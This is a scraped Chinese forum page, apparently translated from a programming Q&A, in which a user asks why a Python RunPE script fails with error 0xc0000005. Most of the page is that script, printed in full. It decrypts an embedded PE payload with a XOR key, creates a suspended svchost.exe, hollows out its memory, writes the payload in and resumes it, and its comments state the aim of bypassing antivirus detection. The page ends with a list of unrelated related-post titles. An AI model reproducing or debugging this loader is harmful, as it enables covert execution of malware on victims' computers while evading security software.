python36.dll 0xc000005_使用python运行时出现0xc000005错误
我必须学习如何在python下实现runPE(出于教育目的)。在
但是,由于我对这个领域了解不多,所以我试图修改源代码以使它们能够正常工作(因为实际上,在github上发布的python下的所有runPE项目目前都无法工作)。在So I decided to train under the project: https:
//github.com/oueldz4/runpe
首先,为了跟你说清楚,我需要和你谈谈这是什么。在RunPE is the generic name of a technique used by many malware.
This technique consists in launching a new process in pause, then
replacing the memory contents of the executable in pause and finally
to release the process. This allows you to run a complete executable
without having to put it on the disk. This avoids detection by the
antivirus.
所以,正如你所看到的,这种方法被用来感染计算机而不被反病毒检测到。然而,就我而言,我希望实现这个教育项目。安全的世界让我很感兴趣,了解这些机制确实有助于避免在互联网上下载文件而感染自己。在
让我们回到我的问题上来。在
加密程序最终输出以下代码:#!/usr/bin/env python
# This script uses the runpe technique to bypass AV detection
# The payload it contains, is encrypted each time with a random key
# INSTALL pefile and ctypes packages
from itertools import cycle, izip
import sys, pefile
import ctypes
BYTE = ctypes.c_ubyte
WORD = ctypes.c_ushort
DWORD = ctypes.c_ulong
LPSTR = ctypes.c_char_p
HANDLE = ctypes.c_void_p
CREATE_SUSPENDED = 0x0004
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
class PROCESS_INFORMATION(ctypes.Structure):
_fields_ = [
('hProcess', HANDLE),
('hThread', HANDLE),
('dwProcessId', DWORD),
('dwThreadId', DWORD),
]
class STARTUPINFO(ctypes.Structure):
_fields_ = [
('cb', DWORD),
('lpReserved', LPSTR),
('lpDesktop', LPSTR),
('lpTitle', LPSTR),
('dwX', DWORD),
('dwY', DWORD),
('dwXSize', DWORD),
('dwYSize', DWORD),
('dwXCountChars', DWORD),
('dwYCountChars', DWORD),
('dwFillAttribute', DWORD),
('dwFlags', DWORD),
('wShowWindow', WORD),
('cbReserved2', WORD),
('lpReserved2', DWORD),
('hStdInput', HANDLE),
('hStdOutput', HANDLE),
('hStdError', HANDLE),
]
class FLOATING_SAVE_AREA(ctypes.Structure):
_fields_ = [
("ControlWord", DWORD),
("StatusWord", DWORD),
("TagWord", DWORD),
("ErrorOffset", DWORD),
("ErrorSelector", DWORD),
("DataOffset", DWORD),
("DataSelector", DWORD),
("RegisterArea", BYTE * 80),
("Cr0NpxState", DWORD),
]
class CONTEXT(ctypes.Structure):
_fields_ = [
("ContextFlags", DWORD),
("Dr0", DWORD),
("Dr1", DWORD),
("Dr2", DWORD),
("Dr3", DWORD),
("Dr6", DWORD),
("Dr7", DWORD),
("FloatSave", FLOATING_SAVE_AREA),
("SegGs", DWORD),
("SegFs", DWORD),
("SegEs", DWORD),
("SegDs", DWORD),
("Edi", DWORD),
("Esi", DWORD),
("Ebx", DWORD),
("Edx", DWORD),
("Ecx", DWORD),
("Eax", DWORD),
("Ebp", DWORD),
("Eip", DWORD),
("SegCs", DWORD),
("EFlags", DWORD),
("Esp", DWORD),
("SegSs", DWORD),
("ExtendedRegisters", BYTE * 80),
]
encryptedbuff = ("\x75\x6c\xa6\x63\x3a\x37\x36\x63\x35\x62\x38\x36\xc9\x9c\x39\x37"
"\x58\x23\x5b\x55\x53\x10\x4a\x0a\x14\x05\x50\x0e\x4b\x53\x14\x4c"
[...]
)
randomkey = '866c976c1b'
filepath = 'C:\Windows\System32\svchost.exe'
si = STARTUPINFO()
si.cb = ctypes.sizeof(STARTUPINFO)
pi = PROCESS_INFORMATION()
cx = CONTEXT()
cx.ContextFlags = 0x10007
key = cycle(randomkey)
decryptedbuff= ''.join(chr(ord(x) ^ ord(y)) for (x,y) in izip(encryptedbuff, key))
# Get payload buffer as PE file
pe = pefile.PE(data=decryptedbuff)
fd_size = len(decryptedbuff)
print "\n[+] Payload size : "+str(fd_size)
calloc = ctypes.cdll.msvcrt.calloc
p = calloc((fd_size+1), ctypes.sizeof(ctypes.c_char))
ctypes.memmove(p, decryptedbuff, fd_size)
print "[+] Pointer : "+str(hex(p))
pefilepath = pefile.PE(filepath)
# Create new process in suspedend mode using a legitim executable (Ex. svchost.exe)
if ctypes.windll.kernel32.CreateProcessA(None, filepath, None, None, False, CREATE_SUSPENDED, None, None, ctypes.byref(si), ctypes.byref(pi)):
print "[+] Process successfuly launched"
print "[+] PID : %d\n" %pi.dwProcessId
else:
print "Failed to create new process"
print "Error Code: ", ctypes.windll.kernel32.GetLastError()
sys.exit(1)
# Unmap the view of sections of the new process created
if ctypes.windll.ntdll.NtUnmapViewOfSection(pi.hProcess, LPSTR(pefilepath.OPTIONAL_HEADER.ImageBase)):
print "[+] Unmap View Of Section Succeed"
else:
print "Failed to unmap the original exe"
print "Error Code: ", ctypes.windll.kernel32.GetLastError()
sys.exit(1)
# Allocate memory to base address of malicious executable in suspended process
if ctypes.windll.kernel32.VirtualAllocEx(pi.hProcess, pe.OPTIONAL_HEADER.ImageBase, pe.OPTIONAL_HEADER.SizeOfImage, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE):
print "[+] Virtual Alloc Succeed"
else:
print "Failed to allocate virtual memory"
print "Error Code: ", ctypes.windll.kernel32.GetLastError()
# Write in memory malicious file's header
if ctypes.windll.kernel32.WriteProcessMemory(pi.hProcess, LPSTR(pe.OPTIONAL_HEADER.ImageBase), p, ctypes.c_int(pe.OPTIONAL_HEADER.SizeOfHeaders), None):
print "[+] Write Process Memory Succeed"
else:
print "Failed to write to process memory"
print "Error Code: ", ctypes.windll.kernel32.GetLastError()
sys.exit(1)
# Write sections one by one to memory
for section in pe.sections:
if ctypes.windll.kernel32.WriteProcessMemory(pi.hProcess, LPSTR(pe.OPTIONAL_HEADER.ImageBase+section.VirtualAddress), (p+section.PointerToRawData), ctypes.c_int(section.SizeOfRawData), None):
print "[+] Writing Section "+section.Name+" Succeed"
else:
print "Failed to write to process memory"
print "Error Code: ", ctypes.windll.kernel32.GetLastError()
sys.exit(1)
# Get CPU context of this process
if ctypes.windll.kernel32.GetThreadContext(pi.hThread, ctypes.byref(cx)):
print "[+] Get Thread Context Succeed"
else:
print "Failed to get thread context"
print "Error Code: ", ctypes.windll.kernel32.GetLastError()
sys.exit(1)
# Push the address of entry point in eax
cx.Eax = pe.OPTIONAL_HEADER.ImageBase + pe.OPTIONAL_HEADER.AddressOfEntryPoint
# Write ImageBase to Ebx+8
if ctypes.windll.kernel32.WriteProcessMemory(pi.hProcess, LPSTR(cx.Ebx+8), (p+0x11C), 4, None):
print "[+] Write Process Memory Succeed"
else:
print "Failed to write to process memory"
print "Error Code: ", ctypes.windll.kernel32.GetLastError()
sys.exit(1)
# Replace CPU context
if ctypes.windll.kernel32.SetThreadContext(pi.hThread, ctypes.byref(cx)):
print "[+] Set Thread Context Suceed"
else:
print "Failed to set thread context"
print "Error Code: ", ctypes.windll.kernel32.GetLastError()
sys.exit(1)
# Resume the process so windows continues the execution
if ctypes.windll.kernel32.ResumeThread(pi.hThread):
print "[+] Resume Thread Succeed"
print "\n[*] RunPE Succeed"
else:
print "Failed to resume thread"
print "Error Code: ", ctypes.windll.kernel32.GetLastError()
sys.exit(1)
但是,当我尝试使用svchost.exe在
经过多次研究,我还是不明白为什么会有这个问题。
如果将我使用的函数与C或C++中的一些等效项目进行比较,它们看起来是正确和合适的。在
实际上,我的代码通过以下函数:
^{pr2}$
我开始注意到这个项目,它指出了必须遵循哪些步骤才能获得所需的结果:http://www.rohitab.com/discuss/topic/40262-dynamic-forking-process-hollowing/。
实际上,使用这些函数的顺序是不一样的。然而,在我看来,oueldz4项目github中使用的函数似乎与作者留下的评论有关。在
有人能帮我更好地了解这个问题的起因吗?我不知道我错过了什么。。。在
注:我正在尝试在Windows10 64位和Python2.7 32位下执行此操作。此外,我缩短了邮件中的encryptedbuff变量,因为它占用了太多空间。在
python36.dll 0xc000005_使用python运行时出现0xc000005错误相关推荐
- python调用so库 undefind symbol_内嵌Python import时undefined symbol错误及解决 | 学步园
内嵌Python import时undefined symbol错误及解决 以下代码 #include#include#includeintmain(intargc,char*argv[]) ...{ ...
- Adobe flash cs5 的Java运行时环境初始化错误 完美解决方法
Adobe flash cs5 的Java运行时环境初始化错误 完美解决方法 下载网络上的Adobe flash cs5 精简版(绿色版),Java运行时环境初始化时出现错误,你可能需要重装Flash ...
- 进行latex中的稿件运行时出现该错误,找不到STKaiti的字体
进行latex中的稿件运行时出现该错误,找不到STKaiti的字体,在其他搜索引擎搜索相关字体下载即可(非百度,建议谷歌下搜索) 重点:看清是华文楷体STKaiti,每种字体都不一样. ...
- 安装oculus运行时出现问题_PS 2021安装失败?运行时提示程序错误?解决办法全在这里...
PS 2021 安装时提示此时无法安装? PS 2021 运行时提示程序错误? 解决办法全在这里! 由于PS 2021的正式版本出来了,所以这几天问紫枫最多的问题就是这两个问题,一个就是在安装过程中提 ...
- python怎么设置函数超时时间_在python运行时为函数设置超时秒数
我遵循this解.在 我试图为我的函数during runtime设置超时秒数,这使我能够灵活地传递不同的timeout seconds,甚至不打开脚本(测试.py)在 在超时.py在from fun ...
- python运行时修改代码会怎样_python运行时修改代码的方法——monkey patch
monkey patch (猴子补丁) 用来在运行时动态修改已有的代码,而不需要修改原始代码. 简单的monkey patch 实现: [Python] #coding=utf-8 def origi ...
- python 运行时 变量_python运行过程,变量,符号
1,python运行过程 2,编译型,解释型 编译型, C, C++ ------>准备好的一桌子菜,直接吃 一次性把你的代码编译生成机器能够识别的二进制码 解释型: py ...
- python运行时很卡-Python代码运行速度慢?这五种方法很管用
对于Python很多人还是比较了解的,虽然说Python有很多优势但同样具有劣势,Python最大的劣势就是运行效率慢,那么如何提高Python代码运行速度呢?这五种方法很管用. 1.PyPy:在选择 ...
- Python运行时打印汉语拼音表
问题 Python运行时会输出如下汉语拼音表,在代码中并没有这部分的输出. a ai an ang ao a ou b iao c uang iang d e ei en eng er e en f ...
最新文章
- 基于OpenCV的实用图像处理操作
- Ubuntu 14.04+cuda 7.5+caffe安装配置
- 简单的防盗链技术(过滤器原理)
- 【转】HashMap集合中key只能为引用数据类型,不能为基本类型
- 解决:SyntaxError: Non-UTF-8 code starting with '\xe6' in file
- 判断鼠标是否在元素上_是否清扫保洁、是否雾撒降尘?江城环卫车装上了北斗,动动鼠标就知道了...
- android 录音原始文件_Android 11可能最终会取消Android对视频录制的4GB文件大小限制...
- pytorch中tensor类型转换
- Bailian2758 菲波那契数列(2)【递推】
- 无线通信设备安装工程概预算编制_如何编制膜结构工程安装方案?
- 物联网传感技术——压电式传感器
- Python通过哈希算法实现文件完整性校验-以及大型文件完整性校验
- 《计算机的硬件系统》教案,计算机硬件系统的组成教案
- npm login报错:npm notice Beginning October 4, 2021, all connections to the npm registry.......
- 软件工程课程周学习进度报告——第五周
- H5下载安装app(ios端和android)
- Kylin Docker 无法启动的问题 EXITED 139
- 【实用工具】RD Clinet使用教程之ipad连接windows
- python评估函数_python绘制评估优化算法性能的测试函数
- TCL集团2018年净利润达34.7亿元 同比增长30.2%
热门文章
- ISO 26262 标准小解
- 线性代数系列(二)--矩阵变换
- Euclidean division
- 闻道有先后,术业有专攻
- Docker 从入门到实践系列一 - 什么是Docker
- 基于springboot小型车队管理系统毕业设计源码061709
- html大作业展示个人风采,个人风采展示自我介绍精选模板
- 2022年全球市场次氯酸钠总体规模、主要生产商、主要地区、产品和应用细分研究报告
- kms不是盗版,不了解kms的管理员请看下微软官方链接,解决”运行microsoft windows非核心版本的计算机上”的问题(kms不等于盗版)
- 如何将JSONArray转为String数组